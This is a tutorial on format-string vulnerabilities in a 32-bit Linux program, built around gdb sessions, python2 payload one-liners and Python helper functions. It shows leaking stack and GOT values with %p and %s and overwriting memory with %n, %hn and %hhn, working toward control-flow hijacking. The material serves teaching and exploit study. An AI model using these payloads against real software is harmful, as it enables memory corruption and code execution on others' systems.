ESP: 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
EIP: 0x56555642 (<main+133>:    call   0x56555430 <printf@plt>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x56555638 <main+123>:       push   DWORD PTR [ebp-0xc]
   0x5655563b <main+126>:       lea    eax,[ebp-0x94]
   0x56555641 <main+132>:       push   eax
=> 0x56555642 <main+133>:       call   0x56555430 <printf@plt>
   0x56555647 <main+138>:       add    esp,0x20
   0x5655564a <main+141>:       sub    esp,0xc
   0x5655564d <main+144>:       push   0xa
   0x5655564f <main+146>:       call   0x56555450 <putchar@plt>
Guessed arguments:
arg[0]: 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0xffffd57a ("ABCD")
[------------------------------------stack-------------------------------------]
0000| 0xffffd550 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0004| 0xffffd554 --> 0x1
0008| 0xffffd558 --> 0x88888888
0012| 0xffffd55c --> 0xffffffff
0016| 0xffffd560 --> 0xffffd57a ("ABCD")
0020| 0xffffd564 --> 0xffffd584 ("AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p")
0024| 0xffffd568 (" RUV\327UUVT\332\377\367\001")
0028| 0xffffd56c --> 0x565555d7 (<main+26>:     add    ebx,0x1a29)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x56555642 in main ()

The format string is located at 0xffffd584. The output below shows how its bytes are laid out on the stack:

gdb-peda$ x/20w $esp
0xffffd550:     0xffffd584      0x00000001      0x88888888      0xffffffff
0xffffd560:     0xffffd57a      0xffffd584      0x56555220      0x565555d7
0xffffd570:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd580:     0x00000000      0x41414141      0x2e70252e      0x252e7025
0xffffd590:     0x70252e70      0x2e70252e      0x252e7025      0x70252e70
gdb-peda$ x/20wb 0xffffd584
0xffffd584:     0x41    0x41    0x41    0x41    0x2e    0x25    0x70    0x2e
0xffffd58c:     0x25    0x70    0x2e    0x25    0x70    0x2e    0x25    0x70
0xffffd594:     0x2e    0x25    0x70    0x2e
gdb-peda$ python print('\x2e\x25\x70')
.%p

Here is the program's output:

gdb-peda$ c
Continuing.
AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584.0x56555220.0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443.(nil).0x41414141.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e

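0x41414141 is the 13th value printed, so %13$s reads the contents at address 0x41414141. That is, of course, probably not a valid address. Now we replace 0x41414141 with a valid address that we care about, for example the address of the string ABCD, 0xffffd57a: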

$ python2 -c 'print("\x7a\xd5\xff\xff"+".%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0xffffd57a ("ABCD")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0xffffd57a ("ABCD")
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c:     0x08048520      0xffffd584      0x00000001      0x88888888
0xffffd55c:     0xffffffff      0xffffd57a      0xffffd584      0x080481fc
0xffffd56c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd57c:     0x00004443      0x00000000      0xffffd57a      0x3331252e
0xffffd58c:     0x00007324      0xffffd5ca      0x00000001      0x000000c2
gdb-peda$ x/s 0xffffd57a
0xffffd57a:     "ABCD"
gdb-peda$ c
Continuing.
z���.ABCD
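The two manual steps above (locating the marker in the %p dump, then swapping it for a real address) can be sketched in Python 3 using only the standard library. The helper names find_offset and build_read_payload are hypothetical, and the sample leak is a shortened copy of the program output shown earlier; this is an illustration under those assumptions, not a general-purpose tool.

```python
import struct

def find_offset(leak: str, marker: int = 0x41414141, sep: str = ".") -> int:
    """Return the 1-based %N$ index at which `marker` appears in a %p dump."""
    fields = leak.split(sep)[1:]          # fields[0] is the first %p result
    for index, field in enumerate(fields, start=1):
        if field != "(nil)" and int(field, 16) == marker:
            return index
    raise ValueError("marker not found in leak")

def build_read_payload(address: int, offset: int) -> bytes:
    """Little-endian 32-bit address followed by a positional %s that dereferences it."""
    return struct.pack("<I", address) + ".%{}$s".format(offset).encode()

# Shortened copy of the output printed for the AAAA.%p... input above.
leak = ("AAAA.0x1.0x88888888.0xffffffff.0xffffd57a.0xffffd584.0x56555220."
        "0x565555d7.0xf7ffda54.0x1.0x424135d0.0x4443.(nil).0x41414141.0x2e70252e")

offset = find_offset(leak)                          # position of 0x41414141
payload = build_read_payload(0xffffd57a, offset)    # address of "ABCD"
print(offset, payload)
```

The resulting bytes are the same ones the python2 one-liner writes to the file text.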

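Of course, this by itself is not very useful. What we typically do in practice is pass in the GOT address of some function in the program and read back the virtual address of that function. Then, from the relative positions of functions inside libc, we compute the address of the function we actually need (such as system()), as shown below.

First, look at the relocation table: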

$ readelf -r a.out

Relocation section '.rel.dyn' at offset 0x2e8 contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2f0 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a010  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a014  00000407 R_386_JUMP_SLOT   00000000   putchar@GLIBC_2.0
0804a018  00000507 R_386_JUMP_SLOT   00000000   __isoc99_scanf@GLIBC_2.7

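.rel.plt lists four functions to choose from. In principle any of them should do, but in practice some cause trouble. The results below are for printf, __libc_start_main, putchar and __isoc99_scanf, in that order: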

$ python2 -c 'print("\x0c\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffe22cfa.0xffe22d04.0x80481fc.0x80484b0.0xf77afa54.0x1.0x424155d0.0x4443.(nil).0x2e0804a0.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025
$ python2 -c 'print("\x10\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffd439ba.0xffd439c4.0x80481fc.0x80484b0.0xf77b6a54.0x1.0x4241c5d0.0x4443.(nil).0x804a010.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x14\xa0\x04\x08"+".%p"*20)' | ./a.out
.0x1.0x88888888.0xffffffff.0xffcc17aa.0xffcc17b4.0x80481fc.0x80484b0.0xf7746a54.0x1.0x4241c5d0.0x4443.(nil).0x804a014.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e
$ python2 -c 'print("\x18\xa0\x04\x08"+".%p"*20)' | ./a.out
▒.0x1.0x88888888.0xffffffff.0xffcb99aa.0xffcb99b4.0x80481fc.0x80484b0.0xf775ca54.0x1.0x424125d0.0x4443.(nil).0x804a018.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e.0x252e7025.0x70252e70.0x2e70252e

Look closely and you will see that the first result (printf) is wrong. We entered \x0c\xa0\x04\x08 (0x0804a00c), yet position 13 shows 0x2e0804a0. So where did \x0c go? A look at the ASCII table explains it:

Oct   Dec   Hex   Char
──────────────────────────────────────
014   12    0C    FF  '\f' (form feed)

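The byte was dropped because \x0c is a whitespace character: the input is read with scanf (note __isoc99_scanf in the relocation table), and its %s conversion skips leading whitespace and stops at the next whitespace byte. The same happens with the other whitespace bytes: \x09 ('\t'), \x0a ('\n'), \x0b ('\v'), \x0d ('\r') and \x20 (SPACE). Any address containing one of them will break the later steps, so here we choose the last entry (__isoc99_scanf).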
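Checking an address for such bytes before building a payload is easy to automate. The sketch below assumes the target reads its input with scanf("%s"), so the problematic bytes are exactly the ones C's isspace() accepts in the default locale; the helper name bad_bytes is hypothetical, and the GOT addresses are the ones from the readelf output above.

```python
import struct

# Bytes that isspace() accepts in the "C" locale. scanf("%s") skips them at
# the start of the input and stops reading at the first one it meets.
SCANF_WHITESPACE = frozenset(b" \t\n\v\f\r")

def bad_bytes(address: int) -> list:
    """Return the bytes of the little-endian 32-bit address that scanf("%s") would mangle."""
    packed = struct.pack("<I", address)
    return [b for b in packed if b in SCANF_WHITESPACE]

got = {
    "printf": 0x0804a00c,
    "__libc_start_main": 0x0804a010,
    "putchar": 0x0804a014,
    "__isoc99_scanf": 0x0804a018,
}

# True means the address survives scanf("%s") unchanged.
usable = {name: not bad_bytes(addr) for name, addr in got.items()}
print(usable)
```

Only the printf entry is rejected, because its low byte is 0x0c (form feed).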

$ python2 -c 'print("\x18\xa0\x04\x08"+"%13$s")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf
Breakpoint 1 at 0x8048350
gdb-peda$ r < text
[----------------------------------registers-----------------------------------]
EAX: 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd618 --> 0x0
ESP: 0xffffd54c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd54c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd550 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
0008| 0xffffd554 --> 0x1
0012| 0xffffd558 --> 0x88888888
0016| 0xffffd55c --> 0xffffffff
0020| 0xffffd560 --> 0xffffd57a ("ABCD")
0024| 0xffffd564 --> 0xffffd584 --> 0x804a018 --> 0xf7e3a790 (<__isoc99_scanf>: push   ebp)
0028| 0xffffd568 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20w $esp
0xffffd54c:     0x08048520      0xffffd584      0x00000001      0x88888888
0xffffd55c:     0xffffffff      0xffffd57a      0xffffd584      0x080481fc
0xffffd56c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd57c:     0x00004443      0x00000000      0x0804a018      0x24333125
0xffffd58c:     0x00f00073      0xffffd5ca      0x00000001      0x000000c2
gdb-peda$ x/w 0x804a018
0x804a018:      0xf7e3a790
gdb-peda$ c
Continuing.
▒����

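The x/w command gives us the virtual address of __isoc99_scanf, 0xf7e3a790. However, what is stored at 0x804a018 is itself a pointer rather than printable text, so %13$s emits it as raw bytes that the terminal cannot display legibly. Later on we show how to use pwntools to capture those bytes as a properly formatted virtual address and put it to further use.

Note that stepping the argument pointer in 4-byte jumps (such as AAAA) does not always land exactly on the start of the format string. Sometimes a prefix of one, two or three characters has to be placed before the format string so that a series of 4-byte jumps lines up with it.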
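The raw bytes are perfectly usable once they are captured by a script instead of a terminal. The following Python 3 sketch decodes such a leak with the standard struct module. The function name parse_leaked_pointer is hypothetical, and the sample bytes are reconstructed from the gdb values above (the echoed address 0x0804a018 followed by the stored pointer 0xf7e3a790), not captured from a real run.

```python
import struct

def parse_leaked_pointer(output: bytes, prefix_len: int = 4) -> int:
    """Skip the echoed address and decode the next 4 bytes as a little-endian pointer."""
    raw = output[prefix_len:prefix_len + 4]
    if len(raw) < 4:
        # %s stops at the first NUL byte, so a pointer containing 0x00 is cut short.
        raise ValueError("leak truncated, possibly by a NUL byte in the pointer")
    return struct.unpack("<I", raw)[0]

# Reconstructed sample: address bytes echoed by printf, then the GOT contents.
sample = b"\x18\xa0\x04\x08" + b"\x90\xa7\xe3\xf7"
scanf_addr = parse_leaked_pointer(sample)
print(hex(scanf_addr))
```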

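Overwriting Stack Contents

We can now read memory on the stack and at arbitrary addresses. Next we go one step further and hijack the program's control flow by modifying the stack and memory. The %n conversion specifier stores the number of characters successfully written to the stream or buffer so far into the integer whose address is given by the corresponding argument.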

#include <stdio.h>
int main(void) {
    int i;
    char str[] = "hello";

    printf("%s %n\n", str, &i);
    printf("%d\n", i);
}
$ ./a.out
hello
6

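i is set to 6 because six characters (hello plus one space) had been written before the conversion specifier was reached. Without a length modifier, %n writes a value of type int.

Usually the value we want to write is the address of some shellcode, and that address tends to be a very large number. To control how many characters are written, we use a conversion specification with an explicit width or precision: a decimal integer in the format string gives the minimum number of characters to output. If the value needs more characters than the given width, it is printed in full; otherwise it is padded with spaces or zeros (for zero padding, put a . or a 0 in front of the number). For example: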

#include <stdio.h>
int main(void) {
    int i;

    printf("%10u%n\n", 1, &i);
    printf("%d\n", i);
    printf("%.50u%n\n", 1, &i);
    printf("%d\n", i);
    printf("%0100u%n\n", 1, &i);
    printf("%d\n", i);
}
$ ./a.out
         1
10
00000000000000000000000000000000000000000000000001
50
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001
100

That is all there is to it. Now let's write the address 0x8048000 into memory:

printf("%0134512640d%n\n", 1, &i);
$ ./a.out
...
0x8048000
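The counts that %n would store in these examples can be predicted offline. For the simple integer conversions used here, Python's % operator follows the same width and precision rules as C's printf, so the length of the formatted string equals the value %n would receive. This is only a convenience for these cases, not a full printf emulation, and the helper names chars_written and width_spec are hypothetical.

```python
def chars_written(fmt: str, *args) -> int:
    """Length of the formatted text, i.e. the value a trailing %n would store."""
    return len(fmt % args)

def width_spec(value: int) -> str:
    """Format directive whose zero-padded width makes %n store `value`."""
    return "%0{}d%n".format(value)

print(chars_written("%s ", "hello"))   # hello plus one space
print(chars_written("%10u", 1))        # width 10, space padded
print(chars_written("%.50u", 1))       # precision 50, zero padded
print(chars_written("%0100u", 1))      # width 100, zero padded
print(width_spec(0x8048000))           # 0x8048000 expressed as a decimal width
```

The last line only builds the directive; actually formatting it would produce roughly 134 million characters of output, which is the cost the later sections work around.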

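Back to our original program. Let's try to change arg2 to a value of our choosing (say 0x00000020, decimal 32). gdb shows that arg2 lives at 0xffffd538, so we build the format string \x38\xd5\xff\xff%08x%08x%012d%13$n. Here \x38\xd5\xff\xff is the address of arg2 and takes 4 bytes; %08x%08x prints two hexadecimal numbers, each 8 characters wide, for 16 bytes; %012d takes 12 bytes. Together the three parts produce 4+16+12=32 characters, so arg2 is set to 0x00000020. The final part, %13$n, is also the most important one. As before, it refers to the 13th argument of the format string, which is the stack slot (0xffffd564) where 0xffffd538 was written. printf() uses the address stored there to find the memory to overwrite: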

$ python2 -c 'print("\x38\xd5\xff\xff%08x%08x%012d%13$n")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0xffffd538      0x78383025
0xffffd56c:     0x78383025      0x32313025      0x33312564      0x00006e24
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x20 (' ')
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x20 (' ')
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x20 (' ')
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x00000020      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0xffffd538      0x78383025      0x78383025
0xffffd570:     0x32313025      0x33312564      0x00006e24      0xf7e70240

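Compare the output before and after printf() runs. printf first resolves %13$n and reads the value 0xffffd538 stored at 0xffffd564. It then goes to address 0xffffd538 and overwrites the value 0x88888888 there with 0x00000020, which gives arg2=0x00000020.

Overwriting Memory at Arbitrary Addresses

You may have spotted a problem: with the method above, the smallest value we can write is 4, because the address alone accounts for 4 bytes of output. So how do we write a value smaller than 4? Integer overflow is one option, but in practice it almost never works. Think again: in every input so far, the address came before the format directives. Is that really necessary? Could the address go somewhere else? Let's try the format string "AA%15$nA"+"\x38\xd5\xff\xff". The leading AA takes two bytes, so the value written to the target address is 2. Next comes %15$n, which takes 5 bytes. It is %15$n rather than %13$n because the address now sits later in the buffer, at the 15th argument of the format string. A trailing A takes one more byte. The front part therefore takes 2+5+1=8 bytes in total, exactly the width of two arguments, so the address that follows starts on an argument boundary. This alignment to 8 bytes is essential. Last comes the address we want to overwrite, \x38\xd5\xff\xff. The detailed output follows: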
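The character arithmetic behind this write can be sketched in Python 3. Note the swapped-in technique: instead of the %08x%08x%012d sequence used above, the helper pads with a single %Nc directive, which yields the same count of 32. The name build_small_write is hypothetical, and the sketch assumes a 32-bit target whose printf accepts a mix of plain and positional directives, as the glibc run above does.

```python
import struct

def build_small_write(address: int, value: int, index: int) -> bytes:
    """Address first, then pad the output up to `value` characters, then %n."""
    if value < 4:
        raise ValueError("the 4 address bytes already count as output")
    pad = value - 4                                  # characters still missing
    filler = "%{}c".format(pad).encode() if pad else b""
    return struct.pack("<I", address) + filler + "%{}$n".format(index).encode()

# Count produced by the document's own payload: address + %08x + %08x + %012d.
document_count = 4 + 8 + 8 + 12

payload = build_small_write(0xffffd538, 0x20, 13)
print(document_count, payload)
```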

$ python2 -c 'print("AA%15$nA"+"\x38\xd5\xff\xff")' > text
$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
gdb-peda$ b printf  
Breakpoint 1 at 0x8048350
gdb-peda$ r < text  
[----------------------------------registers-----------------------------------]
EAX: 0xffffd564 ("AA%15$nA8\325\377\377")
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x1
EDX: 0xf7f9883c --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd52c --> 0x8048520 (<main+138>:      add    esp,0x20)
EIP: 0xf7e27c20 (<printf>:      call   0xf7f06d17 <__x86.get_pc_thunk.ax>)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xf7e27c1b <fprintf+27>:     ret
   0xf7e27c1c:  xchg   ax,ax
   0xf7e27c1e:  xchg   ax,ax
=> 0xf7e27c20 <printf>: call   0xf7f06d17 <__x86.get_pc_thunk.ax>
   0xf7e27c25 <printf+5>:       add    eax,0x16f243
   0xf7e27c2a <printf+10>:      sub    esp,0xc
   0xf7e27c2d <printf+13>:      mov    eax,DWORD PTR [eax+0x124]
   0xf7e27c33 <printf+19>:      lea    edx,[esp+0x14]
No argument
[------------------------------------stack-------------------------------------]
0000| 0xffffd52c --> 0x8048520 (<main+138>:     add    esp,0x20)
0004| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0008| 0xffffd534 --> 0x1
0012| 0xffffd538 --> 0x88888888
0016| 0xffffd53c --> 0xffffffff
0020| 0xffffd540 --> 0xffffd55a ("ABCD")
0024| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
gdb-peda$ x/20x $esp
0xffffd52c:     0x08048520      0xffffd564      0x00000001      0x88888888
0xffffd53c:     0xffffffff      0xffffd55a      0xffffd564      0x080481fc
0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0x31254141      0x416e2435
0xffffd56c:     0xffffd538      0xffffd500      0x00000001      0x000000c2
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x7
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x2
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 ("AA%15$nA8\325\377\377")
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x00000002      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0x31254141      0x416e2435      0xffffd538
0xffffd570:     0xffffd500      0x00000001      0x000000c2      0xf7e70240

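Comparing the output before and after printf() runs, we can see that arg2 has been set to 0x00000002.

That covers writing values smaller than 4. Now for large values. The earlier method writes a value by using its decimal form directly as a field width. However, this takes up too much space and often overwrites other important addresses, causing errors. Instead, we can use a length modifier to change the size of the value that is written: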
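Placing the address after the directive means the positional index depends on the length of the prefix, which in turn depends on the number of digits in the index. A small Python 3 sketch can settle this by iterating until the two agree. The name build_trailing_write is hypothetical, and base_index is assumed to be the argument position at which the buffer starts (13 for this program).

```python
import struct

def build_trailing_write(address: int, value: int, base_index: int) -> bytes:
    """Emit `value` filler bytes, then %N$n, pad to a 4-byte boundary, then the address."""
    index = base_index
    while True:
        head = b"A" * value + "%{}$n".format(index).encode()
        head += b"A" * (-len(head) % 4)          # padding after %n is not counted by it
        needed = base_index + len(head) // 4     # argument slot where the address lands
        if needed == index:
            return head + struct.pack("<I", address)
        index = needed                           # retry with the corrected index

payload = build_trailing_write(0xffffd538, 2, 13)
print(payload)
```

For value 2 this reproduces the AA%15$nA prefix used above.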

char c;
short s;
int i;
long l;
long long ll;

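printf("%s %hhn\n", str, &c);       // writes 1 byte (char)
printf("%s %hn\n", str, &s);        // writes 2 bytes (short)
printf("%s %n\n", str, &i);         // writes 4 bytes (int)
printf("%s %ln\n", str, &l);        // writes sizeof(long): 4 bytes on 32-bit x86, 8 bytes on x86-64 Linux
printf("%s %lln\n", str, &ll);      // writes 8 bytes (long long)

Let's try it: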

$ python2 -c 'print("A%15$hhn"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x88888801      0xffffffff

$ python2 -c 'print("A%15$hnA"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x88880001      0xffffffff

$ python2 -c 'print("A%15$nAA"+"\x38\xd5\xff\xff")' > text
0xffffd530:     0xffffd564      0x00000001      0x00000001      0xffffffff
